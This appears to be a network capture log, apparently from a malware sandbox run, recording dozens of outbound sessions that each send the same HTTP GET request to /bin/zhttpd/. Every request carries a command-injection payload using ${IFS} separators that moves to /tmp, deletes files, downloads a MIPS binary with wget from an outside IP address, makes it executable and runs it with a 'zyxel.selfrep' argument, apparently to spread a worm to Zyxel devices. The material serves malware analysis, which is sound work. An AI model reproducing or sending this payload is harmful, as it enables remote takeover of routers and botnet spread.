                                      Jan 19, 2024 17:29:42.985044003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6967192.168.2.143381231.134.36.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.985069036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6968192.168.2.143717852.17.179.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.985124111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6969192.168.2.1437588222.40.189.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.985158920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6970192.168.2.144614048.225.22.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.985203028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6971192.168.2.1445564123.104.145.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.985244989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6972192.168.2.145507691.95.4.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.985296965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6973192.168.2.1441360170.133.84.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.985331059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6974192.168.2.145098238.158.80.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.985354900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6975192.168.2.144967239.202.203.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.985403061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6976192.168.2.1445360116.64.153.213443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.985451937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6977192.168.2.1444244128.82.142.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.985495090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6978192.168.2.14415544.220.182.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.985534906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6979192.168.2.14372361.86.63.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.985567093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6980192.168.2.1437416118.243.226.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.985589981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6981192.168.2.1447734221.46.215.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.985630989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6982192.168.2.144513452.117.114.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.985680103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6983192.168.2.1460748182.189.45.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.985742092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6984192.168.2.144502214.55.23.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.985780954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6985192.168.2.144541285.69.41.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.985827923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6986192.168.2.1457590198.180.48.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.985848904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6987192.168.2.143990241.221.141.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.985882044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6988192.168.2.143617485.247.188.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.985918999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6989192.168.2.1440702143.193.85.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.985937119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6990192.168.2.1444720190.78.210.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.986005068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6991192.168.2.1444496160.65.9.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.986040115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6992192.168.2.144359644.117.16.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.986069918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6993192.168.2.144312046.184.243.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.986131907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6994192.168.2.144932446.10.73.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.986161947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6995192.168.2.1455724140.194.54.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.986213923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6996192.168.2.14469529.246.148.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.986257076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6997192.168.2.1434160174.175.56.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.986284971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6998192.168.2.1436952113.113.211.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.986321926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6999192.168.2.145353048.97.93.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.986366987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7000192.168.2.1439076189.67.76.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.986396074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7001192.168.2.1458448103.45.243.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.986424923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7002192.168.2.144563874.227.178.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.986486912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7003192.168.2.144437035.126.217.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.986521959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7004192.168.2.1445802189.98.81.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.986572981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7005192.168.2.144234448.106.19.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.986614943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7006192.168.2.145303859.152.207.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.986666918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7007192.168.2.1445088212.30.101.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.986715078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7008192.168.2.1436466220.192.147.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.986749887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7009192.168.2.1434648148.247.9.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.986799002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7010192.168.2.1448886115.205.56.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.986824036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7011192.168.2.145606235.244.195.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.986854076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7012192.168.2.1447012146.92.106.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.986886024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7013192.168.2.1436484163.160.30.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.986942053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7014192.168.2.1454580101.112.127.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.986959934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7015192.168.2.1445458139.206.93.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.987016916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7016192.168.2.143803264.42.185.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.987040997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7017192.168.2.1449630138.117.18.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.987052917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7018192.168.2.1435230101.147.201.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.987108946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7019192.168.2.1445494213.161.177.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.987160921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7020192.168.2.144307690.128.46.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.987186909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7021192.168.2.143356887.124.72.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.987216949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7022192.168.2.144202283.89.54.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.987271070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7023192.168.2.1438362180.165.207.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.987310886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7024192.168.2.1444166149.57.187.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.987344027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7025192.168.2.1446140183.81.208.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.987366915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7026192.168.2.1443430219.167.191.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.987432003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7027192.168.2.144100447.148.253.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.987458944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7028192.168.2.1434744184.85.162.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.987488031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7029192.168.2.1443874213.146.127.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.987539053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7030192.168.2.1444238165.194.18.158443
                                      TimestampBytes transferredDirectionData
